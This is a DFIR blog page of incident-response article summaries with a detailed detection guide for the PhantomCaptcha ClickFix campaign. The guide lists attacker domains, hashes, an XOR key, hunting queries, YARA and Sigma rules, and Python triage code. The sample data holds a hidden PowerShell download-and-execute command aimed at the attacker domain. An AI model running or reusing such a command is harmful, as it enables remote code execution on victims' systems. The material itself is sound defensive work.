Incident-Response

GenAI discovery at Techno West 2025: DFIR collection, artifacts, and authenticity workflows

4n6 Beat
7 min read

Techno Security & Digital Forensics Conference West 2025 kicks off in San Diego on October 27–29 at the Town & Country Resort, with a strong emphasis on Generative/Agentic AI discovery and legal impacts (event announcement, program highlights). Legal-oriented sessions are explicitly tackling discovery for GenAI and agentic AI, including JAMS’ panel “Artificial Intelligence and Generative AI: Causes of Action and Defenses and Discovery” scheduled for Monday, October 27 at 3:15 p.m. (JAMS session page). Regional partners also underline the AI-heavy tracks (Cybersecurity, eDiscovery, Forensics, Investigations) running October 27–29 (CCOE event listing).

MSAB Q3 2025: What BruteStorm Surge and Suite Upgrades Mean for Your DFIR Playbook

4n6 Beat
8 min read

MSAB’s Q3 2025 release introduces BruteStorm Surge, a GPU‑accelerated brute‑force add‑on for XRY Pro that targets long/complex passcodes, alongside major suite updates: XAMN 8.3 adds cross‑app conversation threading and support for Cash App warrant returns; UNIFY 25.9 can ingest Cellebrite UFDR and GrayKey extractions; and XEC 7.15 brings role‑based access control (RBAC). These capabilities are confirmed in MSAB’s official update and the initial news brief. See MSAB’s release post and feature breakdown (MSAB Q3 2025; Forensic Focus news).

Microsoft’s unified Defender for Identity sensor is GA: What DFIR teams should change today

4n6 Beat
6 min read

Microsoft announced general availability of a unified Microsoft Defender for Identity sensor that correlates identity and endpoint telemetry across on‑premises Active Directory, Microsoft Entra ID, and even third‑party identity providers (e.g., Okta), improving incident correlation and enabling automatic attack disruption with richer identity context. The post also signals migration guidance for existing customers in the coming months. Microsoft Security Blog, 2025‑10‑23.

Why this matters to DFIR: identity evidence that used to be scattered (AD security events, Entra sign‑ins, endpoint logons) is now designed to land in one incident and one hunting surface (Defender XDR), with contain/disable actions tied directly to identity context. That reduces dwell time and speeds attribution and scoping. Microsoft Security Blog.

Identity-First Intrusions Dominate: DFIR takeaways from Microsoft’s 2025 Digital Defense Report and the Oct 22 DFIR Round‑Up

4n6 Beat
6 min read

Forensic Focus’ Oct 22, 2025 roundup spotlights Microsoft’s new Digital Defense Report (MDDR) and a wave of DFIR-relevant updates. Microsoft reports that more than half of attacks with known motives are driven by extortion or ransomware, with 80% of investigated incidents targeting data theft for financial gain. Microsoft also processes ~100 trillion security signals daily, blocks ~4.5M new malware attempts, and analyzes 38M identity risk detections. Critically, over 97% of identity attacks are password attacks—and phishing‑resistant MFA can block >99% of them. (Forensic Focus roundup; Microsoft On the Issues article; MDDR 2025 overview). (forensicfocus.com)

Operation DreamJob hits Europe’s UAV supply chain: What DFIR teams need to collect, hunt, and block

4n6 Beat
8 min read

ESET documented a late‑March through mid‑2025 surge of Operation DreamJob activity attributed to North Korea–aligned Lazarus, targeting multiple European defense companies — including firms that build UAV components and UAV software — to steal proprietary designs and manufacturing know‑how. Initial access relied on classic “dream job” lures and trojanized readers/loaders; later stages delivered ScoringMathTea, a Lazarus RAT with ~40 commands. ESET links the focus on UAV know‑how to North Korea’s push to scale its domestic drone program. (ESET WeLiveSecurity). (welivesecurity.com)

Stormcast Week of Oct 24, 2025: WSUS RCE, Magento "SessionReaper" exploitation, DNS cache-poisoning fixes, and an Android/Termux infostealer

4n6 Beat
7 min read

SANS Internet Storm Center’s Oct 24, 2025 Stormcast flags four items that should immediately shape triage and detection content across enterprise environments: an Android infostealer abusing Termux, active exploitation of Adobe Commerce/Magento “SessionReaper,” new cache-poisoning fixes for BIND and Unbound resolvers, and a released exploit for a critical WSUS deserialization RCE. Reference the minimal Stormcast entry and the full podcast summary for context (ISC diary 32418, podcast detail).

Below is a forensics-first breakdown: what to collect, where to hunt, and how to contain.

DFIR field guide: Investigating ToolShell-driven SharePoint intrusions (Talos IR Q3 2025)

4n6 Beat
7 min read

Cisco Talos IR’s Q3 2025 report highlights a sharp rise in compromises that began with exploitation of on‑premises Microsoft SharePoint via the ToolShell chain. More than 60% of Talos engagements involved exploitation of public‑facing apps, and almost 40% showed ToolShell activity; ransomware dropped to ~20% of cases while post‑exploitation phishing from compromised accounts continued to climb (Talos IR Q3 2025). Microsoft confirms active, multi‑actor abuse of new SharePoint bugs (CVE‑2025‑53770, CVE‑2025‑53771) related to earlier July CVEs (CVE‑2025‑49704, CVE‑2025‑49706), and stresses that only on‑prem servers are affected—not SharePoint Online (Microsoft Security TI, MSRC customer guidance). CISA added CVE‑2025‑53770 to the KEV catalog, underscoring exploitation in the wild (CISA KEV entry).

PhantomCaptcha: WebSocket RAT over ClickFix — Practitioner Notes, Artifacts, and Detections

4n6 Beat
5 min read

On October 22, 2025, SentinelLabs documented a one‑day spearphishing operation dubbed “PhantomCaptcha” that targeted Ukraine-linked NGOs and regional government staff. The chain blends a fake Cloudflare CAPTCHA with a ClickFix/Paste‑and‑Run prompt that executes staged PowerShell, culminating in a WebSocket-based RAT using JSON tasking. The campaign’s notable indicators include lure domain zoomconference[.]app, backend C2 bsnowcommunications[.]com, an embedded XOR key, and explicit attempts to suppress PowerShell history. (SentinelLabs report). (sentinelone.com)

Why it matters to DFIR

Attack chain (condensed)

  1. Spearphishing email with a PDF that links to zoomconference[.]app, presenting a fake Cloudflare challenge. Clicking leads to a popup instructing “Copy token” then Win+R paste to run. (SentinelLabs; ATT&CK T1566.001/002). (sentinelone.com)
  2. The button places a command on clipboard that launches PowerShell headlessly via conhost.exe, fetching a stage from /cptch/${clientId}. (SentinelLabs). (sentinelone.com)
  3. Stage 1: large obfuscated PowerShell “cptch” downloader; core behavior = fetch next stage. Stage 2: “maintenance” collects host identifiers, XOR‑encodes with a hardcoded key, disables PSReadLine history, and retrieves Stage 3. Stage 3: a PowerShell RAT maintaining a WebSocket connection to bsnowcommunications[.]com, exchanging Base64‑encoded JSON tasks with keys like “cmd” and “psh”. (SentinelLabs). (sentinelone.com)

Artifacts you can pull today

  • Email and doc lure
  • Staging and payloads
    • Stage 1 “cptch” downloader SHA‑256: 3324550964ec376e74155665765b1492ae1e3bdeb35d57f18ad9aaca64d50a44. (SentinelLabs). (sentinelone.com)
    • Stage 2 “maintenance” SHA‑256: 4bc8cf031b2e521f2b9292ffd1aefc08b9c00dab119f9ec9f65219a0fbf0f566; XOR key: b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l; disables history via Set‑PSReadLineOption -HistorySaveStyle SaveNothing. (SentinelLabs; Set‑PSReadLineOption docs). (sentinelone.com)
    • Stage 3 RAT SHA‑256: 19bcf7ca3df4e54034b57ca924c9d9d178f4b0b8c2071a350e310dd645cd2b23; WebSocket C2: wss://bsnowcommunications[.]com:80; JSON tasking keys: cmd, psh. (SentinelLabs). (sentinelone.com)
  • Infrastructure
    • Lure: zoomconference[.]app → 193.233.23[.]81 (KVMKA hosting); backend C2: bsnowcommunications[.]com → 185.142.33[.]131. (SentinelLabs). (sentinelone.com)
  • Local host artifacts (Windows)

Detection and hunting tips

  • Process execution
    • Look for conhost.exe spawning powershell.exe with headless/hidden flags and an inline DownloadString/Invoke-Expression sequence.
// MDE: conhost -> powershell chain with clipboard-style payloads
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "conhost.exe"
| where FileName in~ ("powershell.exe","pwsh.exe")
| where ProcessCommandLine has_any ("DownloadString","Invoke-Expression","-WindowStyle Hidden","-NoProfile")

// MDE: script block contains SaveNothing
DeviceEvents
| where Timestamp > ago(7d)
| where ActionType == "PowerShellScriptBlockLogging"
| where AdditionalFields contains "Set-PSReadLineOption" and AdditionalFields contains "SaveNothing"

// MDE: rare WebSocket to suspicious infra
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "bsnowcommunications.com" or (RemotePort == 80 and RemoteUrl endswith "/" and Protocol == "Tls")
| summarize dcount(DeviceId), make_set(RemoteUrl), make_set(InitiatingProcessFileName) by bin(Timestamp, 1h)
  • File/host IOCs
    • Hunt for SHA‑256s listed above; validate downloads from /cptch/* and /maintenance endpoints where recorded by proxies. (SentinelLabs). (sentinelone.com)
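The same three hunts applied offline, as an added Python example that is not from the SentinelLabs report or this page's own KQL: it scores constructed process-creation records and EID 4104 script-block text against the conhost → PowerShell, DownloadString/Invoke-Expression and SaveNothing criteria above. The stage-path check (/cptch/, /maintenance) is an addition beyond the KQL, and all sample records are constructed.

```python
import re

# Constructed sample records (not real telemetry), shaped like process-creation
# events and EID 4104 script-block text.
PROCESS_EVENTS = [
    {"parent": "conhost.exe", "image": "powershell.exe",
     "cmdline": "powershell -NoProfile -WindowStyle Hidden -c "
                "\"Invoke-Expression (New-Object Net.WebClient).DownloadString("
                "'hxxps://zoomconference[.]app/cptch/abc123')\""},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"parent": "conhost.exe", "image": "pwsh.exe", "cmdline": "pwsh -c Get-Date"},
]
SCRIPT_BLOCKS = [
    "Set-PSReadLineOption -HistorySaveStyle SaveNothing; $h = hostname",
    "Get-ChildItem C:\\Temp | Remove-Item -Force",
]

# Same command-line markers as the MDE query; the stage paths are an added check.
SUSPICIOUS_FLAGS = ("DownloadString", "Invoke-Expression", "-WindowStyle Hidden", "-NoProfile")
STAGE_PATHS = re.compile(r"/cptch/|/maintenance", re.IGNORECASE)


def score_process(ev):
    """Return the hunt criteria a process event matches (empty list = clean)."""
    reasons = []
    if ev["parent"].lower() == "conhost.exe" and ev["image"].lower() in ("powershell.exe", "pwsh.exe"):
        reasons.append("conhost->powershell")
    cl = ev["cmdline"].lower()
    reasons += [f for f in SUSPICIOUS_FLAGS if f.lower() in cl]
    if STAGE_PATHS.search(cl):
        reasons.append("stage-path")
    return reasons


def is_suspicious(ev):
    """Mirror the KQL: conhost parent spawning PowerShell with at least one marker."""
    reasons = score_process(ev)
    return "conhost->powershell" in reasons and len(reasons) > 1


def history_suppressed(script_block):
    """True when the block disables PSReadLine history the way Stage 2 does."""
    s = script_block.lower()
    return "set-psreadlineoption" in s and "savenothing" in s


def triage(process_events=PROCESS_EVENTS, script_blocks=SCRIPT_BLOCKS):
    """Return the command lines and script blocks worth an analyst's attention."""
    return {"processes": [ev["cmdline"] for ev in process_events if is_suspicious(ev)],
            "script_blocks": [b for b in script_blocks if history_suppressed(b)]}
```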

Forensic workflow guidance

  1. Scope and preserve
    • Acquire full disk and volatile memory on suspected workstations that accessed zoomconference[.]app on October 8–9, 2025; preserve enterprise proxy logs for those dates. (SentinelLabs timeline). (sentinelone.com)
  2. PowerShell evidence
    • Even if HistorySaveStyle was set to SaveNothing, Script Block Logging (EID 4104) and Module Logging (EID 4103) can retain code bodies and pipeline details when properly configured. Consider enabling transcription to a write‑only share for future incidents. (Mandiant/Google; Windows policy references). (cloud.google.com)
    • Default PSReadLine history file location (if not disabled): %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt. (artefacts.help). (artefacts.help)
  3. Network corroboration
    • Identify any wss:// traffic to bsnowcommunications[.]com:80 and requests to /cptch/* or /maintenance. Treat any Base64 JSON payloads with keys cmd/psh as high‑fidelity if decrypted/inspected. (SentinelLabs). (sentinelone.com)
  4. Memory analysis
    • Inspect PowerShell runspaces and loaded scriptblocks in memory; look for WebSocket client usage and repeated reconnect loops consistent with a RAT.
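For the network-corroboration and memory steps above, an added Python helper (not SentinelLabs' code) that turns captured Stage 3 frames and Stage 2 beacon bytes into something an analyst can read: Base64 → JSON with a check for the cmd/psh tasking keys, and repeating-key XOR with the key quoted on this page. The byte-wise cyclic XOR layout is an assumption, and every sample frame and beacon below is constructed rather than captured.

```python
import base64
import json

# Values from the SentinelLabs reporting quoted on this page.
XOR_KEY = b"b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l"
TASK_KEYS = {"cmd", "psh"}


def xor_with_key(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encodes and decodes.
    Assumption: Stage 2 applies the key byte-wise and cyclically."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_task_frame(frame: str):
    """Base64 -> JSON. Returns (is_tasking, parsed); is_tasking is True only
    when the object carries a known tasking key. Malformed frames give (False, None)."""
    try:
        obj = json.loads(base64.b64decode(frame, validate=True))
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return False, None
    if not isinstance(obj, dict):
        return False, obj
    return bool(TASK_KEYS & obj.keys()), obj


def triage_frames(frames):
    """Collect the tasking content from a list of captured frames, in order."""
    hits = []
    for frame in frames:
        is_task, obj = decode_task_frame(frame)
        if is_task:
            hits.append({k: obj[k] for k in sorted(TASK_KEYS & obj.keys())})
    return hits


def _b64json(obj) -> str:
    return base64.b64encode(json.dumps(obj).encode()).decode()


# Constructed sample traffic (not captured data): two tasks, a keepalive-style
# frame without tasking keys, and a frame that is not valid Base64.
SAMPLE_FRAMES = [
    _b64json({"cmd": "whoami"}),
    _b64json({"psh": "Get-Process"}),
    _b64json({"ping": 1}),
    "%%not-base64%%",
]
# Constructed Stage 2-style beacon body: identifiers XOR-encoded with the known key.
SAMPLE_BEACON = xor_with_key(b"HOST=WS01;USER=jdoe;ID=abc123")
```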

Quick content matches (YARA/Sigma-style examples)

  • YARA (Stage 2 XOR key string)
rule PhantomCaptcha_Stage2_XORKey
{
  meta:
    author = "DFIR"
    description = "Match Stage2 XOR key from PhantomCaptcha"
  strings:
    $k = "b3yTKRaP4RHKYQMf0gMd4fw1KNvBtv3l" ascii
  condition:
    $k
}
  • Sigma-style rule for the conhost → PowerShell chain (conceptual; the original draft had the parent and child images swapped, and field names here follow the Sigma process_creation convention)
title: PhantomCaptcha ClickFix conhost to PowerShell downloader
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\conhost.exe'
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains|all:
      - 'DownloadString'
      - 'Invoke-Expression'
      - '-WindowStyle Hidden'
  condition: selection
level: medium

Hardening and response actions

  • Block and monitor
    • Add bsnowcommunications[.]com and zoomconference[.]app to blocklists, and monitor for new lookalike registrations such as zoomconference[.]click, which was reported in post‑takedown activity. (SentinelLabs). (sentinelone.com)
    • Alert on ws/wss traffic from endpoints where browsers are not expected to initiate persistent sockets outside sanctioned apps; prioritize non‑443 use. Map to ATT&CK T1071.001. (ATT&CK). (attack.mitre.org)
  • PowerShell logging baseline
  • User comms and controls

Indicators (from reporting)

  • Domains: zoomconference[.]app, bsnowcommunications[.]com. IPs: 193.233.23[.]81, 185.142.33[.]131. Paths: /cptch/${clientId}, /maintenance. Payload hashes provided above. (SentinelLabs). (sentinelone.com)

Takeaways

  • Turn on PowerShell Script Block + Module Logging and consider Transcription now; create alerts for Set‑PSReadLineOption → SaveNothing.
  • Hunt for conhost.exe → powershell.exe chains with DownloadString/Invoke‑Expression and hidden window flags.
  • Monitor/deny outbound WebSocket C2 to unknown domains and non‑standard ports; watch for bsnowcommunications[.]com and successors.
  • Pull enterprise proxy logs for October 8–9, 2025 to scope access to zoomconference[.]app and related pivots; acquire memory on suspected hosts.
  • Push user messaging: never paste “tokens” into Run/PowerShell from web prompts; report such prompts immediately. (Proofpoint ClickFix). (proofpoint.com)

ToolShell-led SharePoint intrusions in Q3 2025: a practitioner’s playbook for forensics, detection, and rapid eviction

4n6 Beat
7 min read

Cisco Talos Incident Response reports that over 60% of their Q3 2025 engagements began with exploitation of public‑facing applications, driven largely by the ToolShell attack chain against on‑premises Microsoft SharePoint; roughly 40% of all engagements involved ToolShell activity. Talos also saw more post‑compromise phishing launched from valid internal accounts and a marked emphasis on segmentation and rapid eviction to contain spread. Ransomware made up about 20% of cases, with actors observed deploying a SharePoint webshell (notably spinstall0.aspx) and, in at least one case, abusing Velociraptor for persistence. Talos IR Q3 2025.

TOLLBOOTH (REF3927): Leaked ASP.NET machine keys to IIS code exec, SEO cloaking, and persistence

4n6 Beat
7 min read

Elastic Security Labs documents an intrusion cluster (REF3927) abusing publicly disclosed ASP.NET machine keys to sign malicious ViewState and achieve in‑process code execution on IIS, then dropping an IIS module dubbed TOLLBOOTH for monetization/persistence and layering in a modified “Hidden” rootkit and off‑the‑shelf tools like Godzilla and GotoHTTP. Elastic report. (elastic.co)

Microsoft independently warned earlier in 2025 that over 3,000 machine keys had been found in public repos and documentation, and that threat actors were already using these to perform ViewState code injection leading to Godzilla deployment. Microsoft Security Blog. (microsoft.com)